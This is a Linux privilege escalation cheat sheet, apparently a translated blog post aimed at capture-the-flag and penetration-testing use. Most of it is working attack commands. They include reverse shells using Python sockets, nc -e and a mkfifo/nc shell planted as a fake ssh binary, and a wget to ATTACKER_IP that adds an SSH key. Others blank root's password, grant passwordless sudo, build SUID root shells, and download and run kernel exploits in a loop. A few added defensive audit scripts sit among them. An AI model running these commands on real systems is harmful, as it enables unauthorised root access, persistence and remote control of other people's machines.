Introduction
This is a Linux privilege escalation cheat sheet covering most of the commonly used techniques; it is an original piece.
After getting a shell
Getting an interactive shell
```bash
$ python -c 'import pty;pty.spawn("/bin/bash")'
```
If that fails, set PATH, TERM and SHELL:
```bash
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
$ export TERM=xterm
$ export SHELL=bash
```
Add a public key to authorized_keys
```bash
$ wget -qO- https://ATTACKER_IP/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys
```
Reverse shell techniques
Common
```bash
$ python -c 'import pty; pty.spawn("/bin/sh")'
```
```bash
$ ssh user@$ip nc $localip 4444 -e /bin/sh
enter user's password
$ python -c 'import pty; pty.spawn("/bin/sh")'
$ export TERM=linux
```
```bash
$ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$ip",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```
```bash
$ echo os.system('/bin/bash')
```
```bash
$ perl -e 'exec "/bin/sh";'
```
tcpdump
```bash
$ echo $'id\n/bin/netcat $ip 443 -e /bin/bash' > /tmp/.test
$ chmod +x /tmp/.test
$ sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root
```
busybox
```
:!bash
:set shell=/bin/bash:shell
!bash
find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' \;
awk 'BEGIN {system("/bin/bash")}'
--interactive
echo "os.execute('/bin/sh')"
sudo nmap --script=exploit.nse
perl -e 'exec "/bin/bash";'
```
Common manual privilege escalation techniques
sudo
```bash
$ sudo su -
$ sudo -l
```
Check the root account
Look for vulnerable or privileged components, e.g. mysql, sudo, udev, python:
```bash
$ echo 'services running as root'; ps aux | grep root; echo 'permissions'; ps aux | awk '{print $11}' | xargs -r ls -la 2>/dev/null | awk '!x[$0]++'; echo 'nfs info'; ls -la /etc/exports 2>/dev/null; cat /etc/exports 2>/dev/null
```
Use netstat to find other connected machines
A command that skips the commented and blank lines of a config file:
```bash
$ alias nonempty="egrep -v '^[ \t]*#|^$'"
```
MySQL privilege escalation
If MySQL is running as root, commands can be run with sys_exec(). For example, to add a user to sudoers:
```sql
sys_exec('usermod -a -G admin username')
```
System version information
```bash
$ cat /etc/issue; cat /etc/*-release; cat /etc/lsb-release; cat /etc/redhat-release;
```
Kernel information
```bash
$ cat /proc/version; uname -a; uname -mrs; rpm -q kernel; dmesg | grep Linux; ls /boot | grep vmlinuz-; file /bin/ls; cat /etc/lsb-release
```
Environment variables
```bash
$ cat /etc/profile; cat /etc/bashrc; cat ~/.bash_profile; cat ~/.bashrc; cat ~/.bash_logout; env; set
```
Find printers
Find installed applications
```bash
$ ls -alh /usr/bin/; ls -alh /sbin/; dpkg -l; rpm -qa; ls -alh /var/cache/apt/archives; ls -alh /var/cache/yum/*;
```
Find writable configuration files
```bash
$ find /etc/ -writable -type f 2>/dev/null
```
Misconfigured services
```bash
$ cat /etc/syslog.conf; cat /etc/chttp.conf; cat /etc/lighttpd.conf; cat /etc/cups/cupsd.conf; cat /etc/inetd.conf; cat /etc/apache2/apache2.conf; cat /etc/my.conf; cat /etc/httpd/conf/httpd.conf; cat /opt/lampp/etc/httpd.conf; ls -aRl /etc/ | awk '$1 ~ /^.*r.*/'
```
Scheduled tasks
```bash
$ crontab -l; ls -alh /var/spool/cron; ls -al /etc/ | grep cron; ls -al /etc/cron*; cat /etc/cron*; cat /etc/at.allow; cat /etc/at.deny; cat /etc/cron.allow; cat /etc/cron.deny
```
Grep for hard-coded passwords
```bash
$ grep -i user [filename]
$ grep -i pass [filename]
$ grep -C 5 "password" [filename]
$ find . -name "*.php" -print0 | xargs -0 grep -i -n 'var $password'
```
Run from the web root
```bash
$ grep "localhost" ./ -R
```
Network configuration
```bash
$ /sbin/ifconfig -a; cat /etc/network/interfaces; cat /etc/sysconfig/network; cat /etc/resolv.conf; cat /etc/sysconfig/network; cat /etc/networks; iptables -L; hostname; dnsdomainname
```
List all users' home directories
```bash
$ ls -ahlR /root/; ls -ahlR /home/
```
History files
```bash
$ cat ~/.bash_history; cat ~/.nano_history; cat ~/.atftp_history; cat ~/.mysql_history; cat ~/.php_history
```
Mail
```bash
$ cat ~/.bashrc; cat ~/.profile; cat /var/mail/root; cat /var/spool/mail/root
```
Find commonly used tools
```bash
$ find / -name wget; find / -name nc*; find / -name netcat*; find / -name tftp*; find / -name ftp
```
Mounted filesystems
```bash
$ mount; df -h; cat /etc/fstab
```
Find binaries with the SUID or SGID bit set.
```bash
$ find / -maxdepth 6 \( -perm -g=s -o -perm -4000 \) ! -type l -exec ls -ld {} \; 2>/dev/null
$ find / -perm -1000 -type d 2>/dev/null
$ find / -perm -g=s -type f 2>/dev/null
```
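As a defender's counterpart to the search above (an added example, not part of the original post), the following snapshots the SUID/SGID files under a root as a baseline and reports anything that appears later, which is what a planted setuid shell would do; the tree it scans in demo is constructed and the script assumes GNU find and coreutils.

```shell
#!/bin/sh
# Added example: baseline the SUID/SGID files on a system and report
# additions. Requires GNU find (-printf) and coreutils (comm, sort).

# suid_list ROOT: print "mode owner path" for every SUID or SGID regular
# file under ROOT (same filesystem only), sorted so runs can be compared.
suid_list() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) \
        -printf '%m %u %p\n' 2>/dev/null | sort
}

# suid_diff BASELINE ROOT: print entries present now but not in BASELINE,
# i.e. new binaries or existing ones whose mode or owner changed.
suid_diff() {
    suid_list "$2" | comm -13 "$1" -
}

# demo: constructed tree standing in for a real root. Take the baseline,
# then drop a 4777 file into tmp (as the "SUID C shell" further down does)
# and show that only that file is reported, printed relative to the root.
demo() {
    root=$(mktemp -d)
    mkdir -p "$root/usr/bin" "$root/tmp"
    : > "$root/usr/bin/passwd"; chmod 4755 "$root/usr/bin/passwd"
    : > "$root/usr/bin/mount";  chmod 4755 "$root/usr/bin/mount"
    suid_list "$root" > "$root/baseline.txt"
    : > "$root/tmp/setuid";     chmod 4777 "$root/tmp/setuid"   # planted
    suid_diff "$root/baseline.txt" "$root" | sed "s#$root##"
    rm -rf "$root"
}

demo
```

On a real host, run suid_list / against a baseline stored off the machine; anything suid_diff prints is either a package update or something to investigate.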
Add a binary to PATH to hijack a command that another SUID binary calls without a fully qualified path.
```bash
$ function /usr/bin/foo () { /usr/bin/echo "It works"; }
$ export -f /usr/bin/foo
$ /usr/bin/foo
It works
```
If you can only change PATH, the following adds a fake ssh binary that spawns a reverse shell:
```bash
$ export PATH="/tmp:/usr/local/bin:/usr/bin:/bin"
$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.1 4444 >/tmp/f" >> /tmp/ssh
$ chmod +x /tmp/ssh
```
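An added example (not from the original post) that checks a PATH value for the conditions this hijack needs: empty or relative entries, and directories that are world-writable or not owned by root. The PATH string and directories in demo are constructed; the checks assume GNU find and coreutils stat.

```shell
#!/bin/sh
# Added example: audit a PATH value for the conditions the hijack above
# needs. An empty or relative entry resolves to the current directory, and
# a directory that is world-writable or not owned by root lets any local
# user plant a look-alike "ssh" or "foo" ahead of the real one.

# path_audit PATHVALUE: one finding per risky entry; prints nothing and
# returns 0 when every entry is an absolute, root-owned, non-writable dir.
path_audit() {
    rc=0
    old_ifs=$IFS; IFS=:; set -f
    set -- $1                      # split on ':' without globbing
    set +f; IFS=$old_ifs
    for dir in "$@"; do
        case "$dir" in
            "") echo "empty entry: resolves to the current directory"; rc=1; continue ;;
            /*) ;;
            *)  echo "relative entry: $dir"; rc=1; continue ;;
        esac
        [ -d "$dir" ] || continue  # a missing directory cannot be abused
        if [ -n "$(find "$dir" -maxdepth 0 -perm -0002)" ]; then
            echo "world-writable: $dir"; rc=1
        fi
        if [ "$(stat -c %U "$dir")" != root ]; then
            echo "not owned by root: $dir"; rc=1
        fi
    done
    return $rc
}

# demo: constructed PATH with a world-writable directory first, an empty
# entry, a relative entry and a clean directory. The first three are always
# reported; ownership findings depend on who runs the demo.
demo() {
    base=$(mktemp -d)
    mkdir -m 1777 "$base/dropzone"  # like /tmp: anyone can add an "ssh"
    mkdir -m 0755 "$base/safe"
    path_audit "$base/dropzone::bin:$base/safe:/usr/bin" || true
    rm -rf "$base"
}

demo
```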
SUID C shell for /bin/bash
```c
#define _GNU_SOURCE
#include <stdlib.h>
#include <unistd.h>

int main(void){
    setresuid(0, 0, 0);
    system("/bin/bash");
}
```
Without an interactive shell
```bash
$ echo -e '#include <stdio.h>\n#include <stdlib.h>\n#include <sys/types.h>\n#include <unistd.h>\n\nint main(void){\n\tsetuid(0);\n\tsetgid(0);\n\tsystem("/bin/bash");\n}' > setuid.c
```
If you can run anything as root, the following changes the binary's owner and sets the SUID flag:
```bash
$ chown root:root /tmp/setuid; chmod 4777 /tmp/setuid;
```
If /etc/passwd has incorrect permissions, you can become root:
```bash
$ echo 'root::0:0:root:/root:/bin/bash' > /etc/passwd; su
```
Add the user www-data to sudoers without a password
```bash
$ echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
```
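Both tricks leave a visible trace, so here is an added example (not from the original post) that audits copies of passwd and sudoers for them: wrong mode or owner, an account with an empty password field, and NOPASSWD rules. The files in demo are constructed copies, and the expected modes (644 and 440) assume a stock Linux layout.

```shell
#!/bin/sh
# Added example: detect the states the two tricks above produce or rely on.
# Checks mode/owner of passwd and sudoers against stock values, reports
# passwd entries with an empty password field (the root:: line above) and
# sudoers rules granting NOPASSWD. demo works on constructed copies only.

# check_mode FILE WANT_MODE: report if FILE's mode or owner differs from
# WANT_MODE and root. Returns 0 when it matches.
check_mode() {
    mode=$(stat -c %a "$1"); owner=$(stat -c %U "$1")
    [ "$mode" = "$2" ] && [ "$owner" = root ] && return 0
    echo "$1: mode $mode owner $owner (expected $2 root)"
    return 1
}

# empty_passwords PASSWD_FILE: accounts whose password field is empty.
# A second field of "x" or "*" is normal; empty means no password needed.
empty_passwords() {
    awk -F: '$2 == "" { print "empty password field: " $1 }' "$1"
}

# nopasswd_rules SUDOERS_FILE: NOPASSWD rules, skipping comment lines.
nopasswd_rules() {
    awk '!/^[ \t]*#/ && /NOPASSWD/ { print "NOPASSWD rule: " $0 }' "$1"
}

# demo: constructed passwd (mode 666, empty root password) and sudoers
# (correct mode, one NOPASSWD rule plus a comment that must be ignored).
demo() {
    d=$(mktemp -d)
    printf 'root::0:0:root:/root:/bin/bash\n' > "$d/passwd"
    printf 'www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n' >> "$d/passwd"
    printf '# NOPASSWD mentioned in a comment is not a rule\n' > "$d/sudoers"
    printf 'root ALL=(ALL:ALL) ALL\nwww-data ALL=NOPASSWD:ALL\n' >> "$d/sudoers"
    chmod 0666 "$d/passwd"; chmod 0440 "$d/sudoers"
    check_mode "$d/passwd" 644 || true
    check_mode "$d/sudoers" 440 || true
    empty_passwords "$d/passwd"
    nopasswd_rules "$d/sudoers"
    rm -rf "$d"
}

demo
```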
If you can sudo chmod:
```bash
$ echo -e '#include <stdio.h>\n#include <stdlib.h>\n#include <sys/types.h>\n#include <unistd.h>\n\nint main(void){\n\tsetuid(0);\n\tsetgid(0);\n\tsystem("/bin/bash");\n}' > setuid.c
$ gcc setuid.c -o /tmp/setuid
$ sudo chown root:root /tmp/setuid; sudo chmod 4777 /tmp/setuid; /tmp/setuid
```
Wildcard injection: if a cron job's command line contains a wildcard, you can create a file whose name is passed as an argument to the cron task. For more information:
https://www.sans.org/reading-room/whitepapers/testing/attack-defend-linux-privilege-escalation-techniques-2016-37562
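To find the precondition rather than exploit it, this added example (not from the original post) scans crontab-format files for commands that contain an unquoted shell wildcard; the crontab in demo is constructed and the field handling assumes Vixie-style crontab layout.

```shell
#!/bin/sh
# Added example: list cron entries whose command contains an unquoted shell
# wildcard, the precondition for the wildcard injection described above
# (the shell expands the glob, so file names in that directory end up as
# arguments). Handles the system layout (schedule, user, command) used by
# /etc/crontab and /etc/cron.d, and the user layout (schedule, command).

# cron_wildcards FILE SYSTEM: SYSTEM=1 for /etc/crontab-style files with a
# user column, 0 for a user crontab. Prints FILE:LINE: command.
cron_wildcards() {
    awk -v sys="$2" -v q="'" '
        /^[ \t]*(#|$)/ { next }                        # comments, blank lines
        /^[ \t]*[A-Za-z_][A-Za-z0-9_]*=/ { next }      # SHELL=, PATH=, MAILTO=
        {
            n = ($1 ~ /^@/) ? 1 : 5                    # @daily etc. use 1 field
            if (sys == 1) n++                          # skip the user column
            cmd = ""
            for (i = n + 1; i <= NF; i++) cmd = cmd (i > n + 1 ? " " : "") $i
            bare = cmd
            gsub("\"[^\"]*\"|" q "[^" q "]*" q, "", bare)   # drop quoted text
            if (bare ~ /[*?]|\[/) print FILENAME ":" FNR ": " cmd
        }' "$1"
}

# demo: constructed /etc/crontab. Line 4 globs the web root for tar and
# line 6 passes a glob to a script, both reported; the quoted "*.gz" on
# line 5 and the plain options on line 7 are not.
demo() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
# constructed crontab for the demo
SHELL=/bin/sh
PATH=/usr/bin:/bin
*/5 * * * * root cd /var/www/html && tar czf /var/backups/www.tgz *
0 2 * * * root /usr/bin/find /var/log -name "*.gz" -mtime +30 -delete
@daily root /usr/local/bin/rotate.sh /var/log/app/*.log
30 1 * * * root /usr/local/bin/backup.sh --target /var/backups
EOF
    cron_wildcards "$f" 1
    rm -f "$f"
}

demo
```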
Fixing exploit compile errors
```bash
$ gcc 9545.c -o 9545 -Wl,--hash-style=both
```
Find other users on the system
```bash
$ id; who; w; last; cat /etc/passwd | cut -d: -f1; echo 'sudoers:'; cat /etc/sudoers; sudo -l
```
World-readable/writable files:
```bash
$ echo "world-writable folders"; find / -writable -type d 2>/dev/null; echo "world-writable folders"; find / -perm -222 -type d 2>/dev/null; echo "world-writable folders"; find / -perm -o=w -type d 2>/dev/null; echo "world-executable folders"; find / -perm -o=x -type d 2>/dev/null; echo "world-writable & executable folders"; find / \( -perm -o=w -perm -o=x \) -type d 2>/dev/null;
```
Find world-readable files:
```bash
$ find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print
```
Find files owned by no user or group
```bash
$ find /dir -xdev \( -nouser -o -nogroup \) -print
```
Add a user to sudoers with Python.
```python
#!/usr/bin/env python
import os
import sys
try:
    os.system('echo "username ALL=(ALL:ALL) ALL" >> /etc/sudoers')
except:
    sys.exit()
```
Ring0 kernel exploit for 2.3/2.4
```bash
$ wget http://downloads.securityfocus.com/vulnerabilities/exploits/36038-6.c; gcc 36038-6.c -m32 -o ring0; chmod +x ring0; ./ring0
```
Inspect network traffic
```bash
$ tcpdump tcp port 80 -w output.pcap -i eth0
```
Common exploits
CVE-2010-3904 - Linux RDS vulnerability - Linux kernel <= 2.6.36-rc8
https://www.exploit-db.com/exploits/15285/
Linux kernel <= 2.6.37 'Full-Nelson.c'
https://www.exploit-db.com/exploits/15704/
CVE-2012-0056 - Mempodipper - Linux kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86 / x64)
https://git.zx2c4.com/CVE-2012-0056/about/
Linux CVE 2012-0056
```bash
$ wget -O exploit.c http://www.exploit-db.com/download/18411
$ gcc -o mempodipper exploit.c
$ ./mempodipper
```
CVE-2016-5195 - Dirty Cow - Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8
https://dirtycow.ninja/
Compile Dirty Cow:
```bash
$ g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
```
Cross-compiling exploits
```bash
$ gcc -m32 -o output32 hello.c   # 32 bit
$ gcc -m64 -o output hello.c     # 64 bit
```
Linux 2.6.32
https://www.exploit-db.com/exploits/15285/
Open xterm remotely
Start an X server
Bind xterm on the local network
```bash
$ xterm -display 127.0.0.1:1
```
Have the target connect back to your machine
```bash
$ /usr/openwin/bin/xterm -display yourip:1
```
Quickly grab the flag
```bash
$ echo " "; echo "uname -a:"; uname -a; echo " "; echo "hostname:"; hostname; echo " "; echo "id"; id; echo " "; echo "ifconfig:"; /sbin/ifconfig -a; echo " "; echo "proof:"; cat /root/proof.txt 2>/dev/null; cat /Desktop/proof.txt 2>/dev/null; echo " "
```
2.6.x quick run
```bash
$ for a in 9352 9513 33321 15774 15150 15944 9543 33322 9545 25288 40838 40616 40611; do wget http://yourIP:8000/$a; chmod +x $a; ./$a; id; done
```
Common scripts
https://www.icekam.com/post/three-linux-privilege-scripts/
Summary
Fairly complete; I've been playing with this recently too.